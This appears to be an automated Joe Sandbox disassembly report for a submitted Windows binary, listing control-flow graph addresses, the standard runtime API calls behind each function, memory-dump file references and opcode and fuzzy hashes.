                                                                                                                                                                                                                                control_flow_graph 965 7ff64488cf60-7ff64488cf85 966 7ff64488d253 965->966 967 7ff64488cf8b-7ff64488cf8e 965->967 968 7ff64488d255-7ff64488d265 966->968 969 7ff64488cf90-7ff64488cfc2 call 7ff64488a814 967->969 970 7ff64488cfc7-7ff64488cff3 967->970 969->968 972 7ff64488cffe-7ff64488d004 970->972 973 7ff64488cff5-7ff64488cffc 970->973 974 7ff64488d014-7ff64488d029 call 7ff64489391c 972->974 975 7ff64488d006-7ff64488d00f call 7ff64488c320 972->975 973->969 973->972 980 7ff64488d02f-7ff64488d038 974->980 981 7ff64488d143-7ff64488d14c 974->981 975->974 980->981 984 7ff64488d03e-7ff64488d042 980->984 982 7ff64488d14e-7ff64488d154 981->982 983 7ff64488d1a0-7ff64488d1c5 WriteFile 981->983 987 7ff64488d156-7ff64488d159 982->987 988 7ff64488d18c-7ff64488d19e call 7ff64488ca18 982->988 985 7ff64488d1d0 983->985 986 7ff64488d1c7-7ff64488d1cd GetLastError 983->986 989 7ff64488d053-7ff64488d05e 984->989 990 7ff64488d044-7ff64488d04c call 7ff6448847c0 984->990 991 7ff64488d1d3 985->991 986->985 992 7ff64488d178-7ff64488d18a call 7ff64488cc38 987->992 993 7ff64488d15b-7ff64488d15e 987->993 1013 7ff64488d130-7ff64488d137 988->1013 995 7ff64488d06f-7ff64488d084 GetConsoleMode 989->995 996 7ff64488d060-7ff64488d069 989->996 990->989 998 7ff64488d1d8 991->998 992->1013 999 7ff64488d1e4-7ff64488d1ee 993->999 1000 7ff64488d164-7ff64488d176 call 7ff64488cb1c 993->1000 1003 7ff64488d08a-7ff64488d090 995->1003 1004 7ff64488d13c 995->1004 996->981 996->995 1006 7ff64488d1dd 998->1006 1007 7ff64488d1f0-7ff64488d1f5 999->1007 1008 7ff64488d24c-7ff64488d251 999->1008 1000->1013 1011 7ff64488d096-7ff64488d099 1003->1011 1012 7ff64488d119-7ff64488d12b call 7ff64488c5a0 1003->1012 1004->981 1006->999 1014 7ff64488d223-7ff64488d22d 1007->1014 1015 7ff64488d1f7-7ff64488d1fa 1007->1015 1008->968 1017 7ff64488d0a4-7ff64488d0b2 1011->1017 1018 7ff64488d09b-7ff64488d09e 1011->1018 1012->1013 1013->998 1024 7ff64488d22f-7ff64488d232 1014->1024 1025 7ff64488d234-7ff64488d243 1014->1025 1022 7ff64488d213-7ff64488d21e call 7ff644884ec4 1015->1022 1023 7ff64488d1fc-7ff64488d20b 1015->1023 1020 7ff64488d110-7ff64488d114 1017->1020 1021 7ff64488d0b4 1017->1021 1018->1006 1018->1017 1020->991 1026 7ff64488d0b8-7ff64488d0cf call 7ff6448939e8 1021->1026 1022->1014 1023->1022 1024->966 1024->1025 1025->1008 1031 7ff64488d0d1-7ff64488d0dd 1026->1031 1032 7ff64488d107-7ff64488d10d GetLastError 1026->1032 1033 7ff64488d0df-7ff64488d0f1 call 7ff6448939e8 1031->1033 1034 7ff64488d0fc-7ff64488d103 1031->1034 1032->1020 1033->1032 1038 7ff64488d0f3-7ff64488d0fa 1033->1038 1034->1020 1036 7ff64488d105 1034->1036 1036->1026 1038->1034
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D07C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64488CF4B), ref: 00007FF64488D107
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction ID: 5c65de6c93bbf58159ffcbd566a08658796fc6587735b1be415a64b3287ab632
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9919032E1C6528DF760BF6594C22BD6BE0BB54B88F145139DE0EA6A9DDF38E446C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                • Instruction ID: 094555275460e41ab38db995bfd1209cf170517ad3ba8f7937622459db9d6069
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1417122D1C7818BE754BB6095923697760FB947A4F109335EE9C83ADAEF7CE5E08700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction ID: 20406683c3d03415e07bcf6f084e28491c8a870ba451ed3030105021b52fbf39
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF311821F0C5468DFA54BB659CF32B91A81AFA1784F449035EE0EC72DFDE6DE844D211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                • Instruction ID: 240f978d4d5679595a8a0e148705fc900db8298baa73cb8d309c21d8b9dc4811
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD09210B0CB068AEB187B706CDB07812567F88B01F142438CC0F9639FEE2EE8894300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                • Instruction ID: db6755850ae78ef7e38998cba850e33e3dd2e148651b14ab5a6fe3f820f7c41a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D51F731B0D6418EF724BE69948267A6291AF86BB4F1A4634DD6D837CDCF3CE4019720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction ID: e2861e93b0de3ffbced3346885e5fece54c8e8843f6073b18273fff152138241
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C311042660CA8185DA20BB25A885169B361BB91FF0F540331EE7D87BDCCF3CD0148700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                • Instruction ID: f5ddc91adfb0ba349af405d72a9fbff26ad0d6a50a078a344d395667dc2e0fad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92E08C21F0D6428AFF1ABBF2A8C713812916FC8B00F440034DC1DC22AAEE2CE8828310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABC6
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABD0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction ID: 59b189c65cfb96843706c69760e74eb70b7cee45c1406d55c645a375db9775ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65219611F1CA8249FA94B75194D637922929FC4BA0F084239DE2EC77DDDF6CE4418300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction ID: 0b893ed7ea0b77047f18fba12e5c3f55551b9bbfb53913e418721c776a8da696
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2841A43291C6458BEA24BB19E58227973A0EFD5780F140131EF8EC76DACF6CE402CB51
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                • Opcode ID: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                • Instruction ID: b180facd7e6e6c62b153ad200c8d47848d85e16c0edc9d3332a0e331b2c62582
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21C721B1CA564EFE50BB226D963BA9651BF45BC4F8C4430EE0D9778ADE7DE441C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                • Instruction ID: f792a154c4f0c818ab992283cc149fc0daed787d2a1d52ccbdc0b672c7175d02
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05313C22A1C65289E652BB55888337C2A90AFC0BA4F911135ED5D873DBEF7CE8858721
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                • Instruction ID: 5d5881feb3f3f24995b23517c4a5e903ca1bdcb2652d3544bbba83f1bddaa9c7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85218E72A087468EEB25BF64C4C22EC33A4FB44718F444636DB6D86ADADF38D584CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction ID: 96bb4147fc3beb661b4045480d50cd633d694023333b54d5cc802c631a456edf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0117232E1C6828AEA60BF11948227DA2A4BF85B84F444435EF8CD7ADFDF3DE5008710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
